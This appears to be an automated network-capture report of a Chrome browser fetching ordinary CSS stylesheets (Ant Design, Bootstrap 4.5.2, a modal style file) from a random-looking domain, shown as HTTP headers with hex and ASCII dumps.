                                          Last-Modified: Mon, 30 Dec 2024 07:51:09 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "677250ed-51130"
                                          Expires: Sun, 12 Jan 2025 12:17:03 GMT
                                          Cache-Control: max-age=43200
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:04 UTC16016INData Raw: 23 61 70 70 20 7b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 0a 7d 0a 0a 2e 64 69 73 70 6c 61 79 2d 66 6c 65 78 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 0a 7d 0a 0a 68 74 6d 6c 5b 64 61 74 61 2d 76 2d 35 33 37 31 61 30 36 36 5d 20 7b 0a 09 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 09 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 32 2e 35 25 0a 7d 0a 0a 5b 64 61 74 61 2d 76 2d 35 33 37 31 61 30 36 36 5d 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 0a 7d 0a 0a 61 5b 64 61 74 61 2d 76 2d 35 33 37 31 61 30 36 36 5d 20 7b 0a 09 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 0a 7d
                                          Data Ascii: #app {text-align: center}.display-flex {display: flex}html[data-v-5371a066] {-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%;font-size: 62.5%}[data-v-5371a066] {margin: 0;padding: 0}a[data-v-5371a066] {outline: none}
                                          2025-01-12 00:17:04 UTC16384INData Raw: 33 76 45 39 6a 37 51 6d 4b 44 32 56 38 6a 6e 52 31 53 6f 73 71 38 57 65 61 45 59 55 56 48 52 33 48 4b 46 5a 55 78 73 44 51 75 31 5a 61 34 73 46 31 6a 79 39 79 32 75 41 39 39 66 5a 59 51 6e 56 74 6a 6d 57 4f 4d 6e 4c 46 46 35 63 67 46 4e 53 73 65 4f 61 34 4a 38 4b 53 4d 68 42 68 4d 74 4a 59 63 32 31 78 64 44 47 68 4f 59 69 65 4b 67 53 71 41 43 34 79 31 5a 59 69 66 6d 47 74 38 33 78 71 6d 45 6c 67 38 2b 6c 31 51 4a 56 4c 44 45 43 34 78 2f 45 75 45 72 74 70 45 71 37 49 74 69 50 47 76 32 2f 78 32 4c 73 36 30 54 33 42 52 2f 73 67 46 6f 53 37 51 6e 44 52 37 58 6c 4e 43 65 79 32 4a 75 6e 57 74 4f 69 73 30 6e 42 45 44 34 68 67 52 77 48 2b 58 59 46 2f 6e 70 4d 35 6d 39 58 6e 6d 4b 76 43 6d 59 59 36 32 46 6b 49 44 2f 70 39 6a 2b 31 4b 41 62 68 62 6a 36 75 4d 62 70
                                          Data Ascii: 3vE9j7QmKD2V8jnR1Sosq8WeaEYUVHR3HKFZUxsDQu1Za4sF1jy9y2uA99fZYQnVtjmWOMnLFF5cgFNSseOa4J8KSMhBhMtJYc21xdDGhOYieKgSqAC4y1ZYifmGt83xqmElg8+l1QJVLDEC4x/EuErtpEq7ItiPGv2/x2Ls60T3BR/sgFoS7QnDR7XlNCey2JunWtOis0nBED4hgRwH+XYF/npM5m9XnmKvCmYY62FkID/p9j+1KAbhbj6uMbp
                                          2025-01-12 00:17:04 UTC16384INData Raw: 74 69 76 65 20 7b 0a 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 61 6e 74 4d 6f 76 65 55 70 4f 75 74 3b 0a 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 61 6e 74 4d 6f 76 65 55 70 4f 75 74 3b 0a 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 70 6c 61 79 2d 73 74 61 74 65 3a 20 72 75 6e 6e 69 6e 67 3b 0a 09 61 6e 69 6d 61 74 69 6f 6e 2d 70 6c 61 79 2d 73 74 61 74 65 3a 20 72 75 6e 6e 69 6e 67 3b 0a 09 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 20 6e 6f 6e 65 0a 7d 0a 0a 2e 6d 6f 76 65 2d 75 70 2d 61 70 70 65 61 72 2c 0a 2e 6d 6f 76 65 2d 75 70 2d 65 6e 74 65 72 20 7b 0a 09 6f 70 61 63 69 74 79 3a 20 30 3b 0a 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e
                                          Data Ascii: tive {-webkit-animation-name: antMoveUpOut;animation-name: antMoveUpOut;-webkit-animation-play-state: running;animation-play-state: running;pointer-events: none}.move-up-appear,.move-up-enter {opacity: 0;-webkit-animation-timing-function
                                          2025-01-12 00:17:04 UTC16384INData Raw: 5a 6f 6f 6d 4f 75 74 3b 0a 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 61 6e 74 5a 6f 6f 6d 4f 75 74 3b 0a 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 70 6c 61 79 2d 73 74 61 74 65 3a 20 72 75 6e 6e 69 6e 67 3b 0a 09 61 6e 69 6d 61 74 69 6f 6e 2d 70 6c 61 79 2d 73 74 61 74 65 3a 20 72 75 6e 6e 69 6e 67 3b 0a 09 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 20 6e 6f 6e 65 0a 7d 0a 0a 2e 7a 6f 6f 6d 2d 61 70 70 65 61 72 2c 0a 2e 7a 6f 6f 6d 2d 65 6e 74 65 72 20 7b 0a 09 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 29 3b 0a 09 6f 70 61 63 69 74 79 3a 20 30 3b 0a 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 30 38 2c 20 2e 38 32
                                          Data Ascii: ZoomOut;animation-name: antZoomOut;-webkit-animation-play-state: running;animation-play-state: running;pointer-events: none}.zoom-appear,.zoom-enter {transform: scale(0);opacity: 0;-webkit-animation-timing-function: cubic-bezier(.08, .82
                                          2025-01-12 00:17:04 UTC16384INData Raw: 61 72 79 3a 61 63 74 69 76 65 3e 61 3a 6f 6e 6c 79 2d 63 68 69 6c 64 20 7b 0a 09 63 6f 6c 6f 72 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 0a 7d 0a 0a 2e 61 6e 74 2d 62 74 6e 2d 70 72 69 6d 61 72 79 2e 61 63 74 69 76 65 3e 61 3a 6f 6e 6c 79 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 0a 2e 61 6e 74 2d 62 74 6e 2d 70 72 69 6d 61 72 79 3a 61 63 74 69 76 65 3e 61 3a 6f 6e 6c 79 2d 63 68 69 6c 64 3a 61 66 74 65 72 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 20 30 3b 0a 09 72 69 67 68 74 3a 20 30 3b 0a 09 62 6f 74 74 6f 6d 3a 20 30 3b 0a 09 6c 65 66 74 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 09 63 6f 6e 74 65 6e 74 3a 20 22 22 0a 7d 0a 0a 2e 61 6e 74 2d 62 74 6e 2d 70 72
                                          Data Ascii: ary:active>a:only-child {color: currentColor}.ant-btn-primary.active>a:only-child:after,.ant-btn-primary:active>a:only-child:after {position: absolute;top: 0;right: 0;bottom: 0;left: 0;background: transparent;content: ""}.ant-btn-pr
                                          2025-01-12 00:17:04 UTC16384INData Raw: 2e 61 6e 74 2d 62 74 6e 2d 6c 69 6e 6b 2e 64 69 73 61 62 6c 65 64 3e 61 3a 6f 6e 6c 79 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 0a 2e 61 6e 74 2d 62 74 6e 2d 6c 69 6e 6b 5b 64 69 73 61 62 6c 65 64 5d 2e 61 63 74 69 76 65 3e 61 3a 6f 6e 6c 79 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 0a 2e 61 6e 74 2d 62 74 6e 2d 6c 69 6e 6b 5b 64 69 73 61 62 6c 65 64 5d 3a 61 63 74 69 76 65 3e 61 3a 6f 6e 6c 79 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 0a 2e 61 6e 74 2d 62 74 6e 2d 6c 69 6e 6b 5b 64 69 73 61 62 6c 65 64 5d 3a 66 6f 63 75 73 3e 61 3a 6f 6e 6c 79 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 0a 2e 61 6e 74 2d 62 74 6e 2d 6c 69 6e 6b 5b 64 69 73 61 62 6c 65 64 5d 3a 68 6f 76 65 72 3e 61 3a 6f 6e 6c 79 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 0a 2e 61 6e 74 2d 62 74 6e 2d 6c
                                          Data Ascii: .ant-btn-link.disabled>a:only-child:after,.ant-btn-link[disabled].active>a:only-child:after,.ant-btn-link[disabled]:active>a:only-child:after,.ant-btn-link[disabled]:focus>a:only-child:after,.ant-btn-link[disabled]:hover>a:only-child:after,.ant-btn-l
                                          2025-01-12 00:17:04 UTC16384INData Raw: 0a 2e 61 6e 74 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 67 68 6f 73 74 2e 61 6e 74 2d 62 74 6e 2d 6c 69 6e 6b 3a 68 6f 76 65 72 3e 61 3a 6f 6e 6c 79 2d 63 68 69 6c 64 3a 61 66 74 65 72 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 20 30 3b 0a 09 72 69 67 68 74 3a 20 30 3b 0a 09 62 6f 74 74 6f 6d 3a 20 30 3b 0a 09 6c 65 66 74 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 09 63 6f 6e 74 65 6e 74 3a 20 22 22 0a 7d 0a 0a 2e 61 6e 74 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 67 68 6f 73 74 2e 61 6e 74 2d 62 74 6e 2d 6c 69 6e 6b 2e 61 63 74 69 76 65 2c 0a 2e 61 6e 74 2d 62 74 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 67 68 6f 73 74 2e 61 6e 74 2d 62 74 6e 2d 6c 69
                                          Data Ascii: .ant-btn-background-ghost.ant-btn-link:hover>a:only-child:after {position: absolute;top: 0;right: 0;bottom: 0;left: 0;background: transparent;content: ""}.ant-btn-background-ghost.ant-btn-link.active,.ant-btn-background-ghost.ant-btn-li
                                          2025-01-12 00:17:04 UTC16384INData Raw: 69 6e 70 75 74 2c 0a 2d 68 61 73 2d 65 72 72 6f 72 20 2e 61 6e 74 2d 69 6e 70 75 74 2d 61 66 66 69 78 2d 77 72 61 70 70 65 72 2c 0a 2d 68 61 73 2d 65 72 72 6f 72 20 2e 61 6e 74 2d 69 6e 70 75 74 2d 61 66 66 69 78 2d 77 72 61 70 70 65 72 3a 68 6f 76 65 72 2c 0a 2d 68 61 73 2d 65 72 72 6f 72 20 2e 61 6e 74 2d 69 6e 70 75 74 3a 68 6f 76 65 72 2c 0a 2e 68 61 73 2d 65 72 72 6f 72 20 2e 61 6e 74 2d 69 6e 70 75 74 2c 0a 2e 68 61 73 2d 65 72 72 6f 72 20 2e 61 6e 74 2d 69 6e 70 75 74 2d 61 66 66 69 78 2d 77 72 61 70 70 65 72 2c 0a 2e 68 61 73 2d 65 72 72 6f 72 20 2e 61 6e 74 2d 69 6e 70 75 74 2d 61 66 66 69 78 2d 77 72 61 70 70 65 72 3a 68 6f 76 65 72 2c 0a 2e 68 61 73 2d 65 72 72 6f 72 20 2e 61 6e 74 2d 69 6e 70 75 74 3a 68 6f 76 65 72 20 7b 0a 09 62 6f 72 64 65
                                          Data Ascii: input,-has-error .ant-input-affix-wrapper,-has-error .ant-input-affix-wrapper:hover,-has-error .ant-input:hover,.has-error .ant-input,.has-error .ant-input-affix-wrapper,.has-error .ant-input-affix-wrapper:hover,.has-error .ant-input:hover {borde
                                          2025-01-12 00:17:04 UTC16384INData Raw: 2e 61 6e 74 2d 63 6f 6c 2d 72 74 6c 20 7b 0a 09 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 6c 65 66 74 3a 20 34 35 2e 38 33 33 33 33 33 33 33 25 0a 7d 0a 0a 2e 61 6e 74 2d 63 6f 6c 2d 6f 66 66 73 65 74 2d 31 31 2e 61 6e 74 2d 63 6f 6c 2d 72 74 6c 20 7b 0a 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 34 35 2e 38 33 33 33 33 33 33 33 25 3b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 0a 7d 0a 0a 2e 61 6e 74 2d 63 6f 6c 2d 70 75 73 68 2d 31 32 2e 61 6e 74 2d 63 6f 6c 2d 72 74 6c 20 7b 0a 09 72 69 67 68 74 3a 20 35 30 25 3b 0a 09 6c 65 66 74 3a 20 61 75 74 6f 0a 7d 0a 0a 2e 61 6e 74 2d 63 6f 6c 2d 70 75 6c 6c 2d 31 32 2e 61 6e 74 2d 63 6f 6c 2d 72 74 6c 20 7b 0a 09 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 6c 65 66 74 3a 20 35 30 25 0a 7d 0a 0a 2e 61 6e 74
                                          Data Ascii: .ant-col-rtl {right: auto;left: 45.83333333%}.ant-col-offset-11.ant-col-rtl {margin-right: 45.83333333%;margin-left: 0}.ant-col-push-12.ant-col-rtl {right: 50%;left: auto}.ant-col-pull-12.ant-col-rtl {right: auto;left: 50%}.ant
                                          2025-01-12 00:17:04 UTC16384INData Raw: 09 7d 0a 0a 09 2e 61 6e 74 2d 63 6f 6c 2d 73 6d 2d 70 75 6c 6c 2d 31 38 20 7b 0a 09 09 72 69 67 68 74 3a 20 37 35 25 0a 09 7d 0a 0a 09 2e 61 6e 74 2d 63 6f 6c 2d 73 6d 2d 6f 66 66 73 65 74 2d 31 38 20 7b 0a 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 37 35 25 0a 09 7d 0a 0a 09 2e 61 6e 74 2d 63 6f 6c 2d 73 6d 2d 6f 72 64 65 72 2d 31 38 20 7b 0a 09 09 6f 72 64 65 72 3a 20 31 38 0a 09 7d 0a 0a 09 2e 61 6e 74 2d 63 6f 6c 2d 73 6d 2d 31 37 20 7b 0a 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 66 6c 65 78 3a 20 30 20 30 20 37 30 2e 38 33 33 33 33 33 33 33 25 3b 0a 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 2e 38 33 33 33 33 33 33 33 25 0a 09 7d 0a 0a 09 2e 61 6e 74 2d 63 6f 6c 2d 73 6d 2d 70 75 73 68 2d 31 37 20 7b 0a 09 09 6c 65 66 74 3a 20
                                          Data Ascii: }.ant-col-sm-pull-18 {right: 75%}.ant-col-sm-offset-18 {margin-left: 75%}.ant-col-sm-order-18 {order: 18}.ant-col-sm-17 {display: block;flex: 0 0 70.83333333%;max-width: 70.83333333%}.ant-col-sm-push-17 {left:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          47192.168.2.449802122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:03 UTC554OUTGET /css/modalStyles.css HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://1k4ej4j1lxvjwz.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:03 UTC365INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:03 GMT
                                          Content-Type: text/css
                                          Content-Length: 9140
                                          Last-Modified: Mon, 30 Dec 2024 07:48:18 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "67725042-23b4"
                                          Expires: Sun, 12 Jan 2025 12:17:03 GMT
                                          Cache-Control: max-age=43200
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:03 UTC9140INData Raw: 2f 2a 20 2d 2d 2d 20 e6 a8 a1 e6 80 81 e7 aa 97 e5 8f a3 e5 9f ba e6 9c ac e6 a0 b7 e5 bc 8f 20 2d 2d 2d 20 2a 2f 0a 0a 2f 2a 20 e8 83 8c e6 99 af e6 a8 a1 e7 b3 8a e6 95 88 e6 9e 9c 20 2a 2f 0a 2e 6d 6f 64 61 6c 2d 62 61 63 6b 64 72 6f 70 2e 73 68 6f 77 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 2e 36 3b 0a 20 20 20 20 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 3a 20 62 6c 75 72 28 33 70 78 29 3b 0a 7d 0a 0a 2f 2a 20 e6 a8 a1 e6 80 81 e6 a1 86 e4 b8 bb e4 bd 93 e6 a0 b7 e5 bc 8f 20 2a 2f 0a 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 35 70 78 20 31
                                          Data Ascii: /* --- --- *//* */.modal-backdrop.show { opacity: 0.6; backdrop-filter: blur(3px);}/* */.modal-content { border-radius: 8px; overflow: hidden; box-shadow: 0 5px 1


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          48192.168.2.449799122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:03 UTC556OUTGET /css/bootstrap.min.css HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://1k4ej4j1lxvjwz.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:03 UTC368INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:03 GMT
                                          Content-Type: text/css
                                          Content-Length: 160257
                                          Last-Modified: Tue, 26 Dec 2023 13:01:53 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "658acec1-27201"
                                          Expires: Sun, 12 Jan 2025 12:17:03 GMT
                                          Cache-Control: max-age=43200
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:03 UTC16016INData Raw: 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 35 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 6c 75 65 3a 23 30 30 37 62 66 66 3b 2d 2d 69 6e 64 69 67 6f 3a 23 36 36 31 30 66 32 3b 2d 2d 70 75
                                          Data Ascii: /*! * Bootstrap v4.5.2 (https://getbootstrap.com/) * Copyright 2011-2020 The Bootstrap Authors * Copyright 2011-2020 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--blue:#007bff;--indigo:#6610f2;--pu
                                          2025-01-12 00:17:03 UTC16384INData Raw: 6c 2d 6c 67 2d 31 31 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 6c 67 2d 31 32 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 6c 67 2d 66 69 72 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 3a 2d 31 7d 2e 6f 72 64 65 72 2d 6c 67 2d 6c 61 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 33 3b 6f 72 64 65 72 3a 31 33 7d 2e 6f 72 64 65 72 2d 6c 67 2d 30 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 30 3b 6f 72 64 65 72 3a 30 7d 2e 6f
                                          Data Ascii: l-lg-11{-ms-flex:0 0 91.666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-lg-12{-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-lg-first{-ms-flex-order:-1;order:-1}.order-lg-last{-ms-flex-order:13;order:13}.order-lg-0{-ms-flex-order:0;order:0}.o
                                          2025-01-12 00:17:04 UTC16384INData Raw: 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 69 6e 76 61 6c 69 64 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 63 33 35 34 35 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 32 32 30 2c 35 33 2c 36 39 2c 2e 32 35 29 7d 2e 77 61 73 2d 76 61 6c 69 64 61 74 65 64 20 74 65 78 74 61 72 65 61 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 3a 69 6e 76 61 6c 69 64 2c 74 65 78 74 61 72 65 61 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2e 69 73 2d 69 6e 76 61 6c 69 64 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 63 61 6c 63 28 31 2e 35 65 6d 20 2b 20 2e 37 35 72 65 6d 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 74 6f 70 20 63 61 6c 63 28 2e 33 37 35 65 6d 20 2b 20 2e 31 38 37 35 72 65 6d 29 20 72 69 67
                                          Data Ascii: form-control:invalid:focus{border-color:#dc3545;box-shadow:0 0 0 .2rem rgba(220,53,69,.25)}.was-validated textarea.form-control:invalid,textarea.form-control.is-invalid{padding-right:calc(1.5em + .75rem);background-position:top calc(.375em + .1875rem) rig
                                          2025-01-12 00:17:04 UTC16384INData Raw: 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 35 32 2c 35 38 2c 36 34 2c 2e 35 29 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 72 6b 2e 64 69 73 61 62 6c 65 64 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 72 6b 3a 64 69 73 61 62 6c 65 64 7b 63 6f 6c 6f 72 3a 23 33 34 33 61 34 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 72 6b 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 64 61 72 6b 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 2c 2e 73 68 6f 77 3e
                                          Data Ascii: {box-shadow:0 0 0 .2rem rgba(52,58,64,.5)}.btn-outline-dark.disabled,.btn-outline-dark:disabled{color:#343a40;background-color:transparent}.btn-outline-dark:not(:disabled):not(.disabled).active,.btn-outline-dark:not(:disabled):not(.disabled):active,.show>
                                          2025-01-12 00:17:04 UTC16384INData Raw: 25 33 65 22 29 20 6e 6f 2d 72 65 70 65 61 74 20 72 69 67 68 74 20 2e 37 35 72 65 6d 20 63 65 6e 74 65 72 2f 38 70 78 20 31 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 65 64 34 64 61 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 2e 63 75 73 74 6f 6d 2d 73 65 6c 65 63 74 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 30 62 64 66 66 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 30 2c 31 32 33 2c 32 35 35 2c 2e 32 35 29 7d 2e 63 75 73 74 6f 6d 2d
                                          Data Ascii: %3e") no-repeat right .75rem center/8px 10px;border:1px solid #ced4da;border-radius:.25rem;-webkit-appearance:none;-moz-appearance:none;appearance:none}.custom-select:focus{border-color:#80bdff;outline:0;box-shadow:0 0 0 .2rem rgba(0,123,255,.25)}.custom-
                                          2025-01-12 00:17:04 UTC16384INData Raw: 2e 32 35 72 65 6d 7d 2e 63 61 72 64 2d 68 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 2e 37 35 72 65 6d 20 31 2e 32 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 33 29 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 35 29 7d 2e 63 61 72 64 2d 68 65 61 64 65 72 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 63 61 6c 63 28 2e 32 35 72 65 6d 20 2d 20 31 70 78 29 20 63 61 6c 63 28 2e 32 35 72 65 6d 20 2d 20 31 70 78 29 20 30 20 30 7d 2e 63 61 72 64 2d 66 6f 6f 74 65 72 7b 70 61 64 64 69 6e 67 3a 2e 37 35 72 65 6d 20 31 2e 32 35 72 65 6d 3b 62 61 63 6b 67
                                          Data Ascii: .25rem}.card-header{padding:.75rem 1.25rem;margin-bottom:0;background-color:rgba(0,0,0,.03);border-bottom:1px solid rgba(0,0,0,.125)}.card-header:first-child{border-radius:calc(.25rem - 1px) calc(.25rem - 1px) 0 0}.card-footer{padding:.75rem 1.25rem;backg
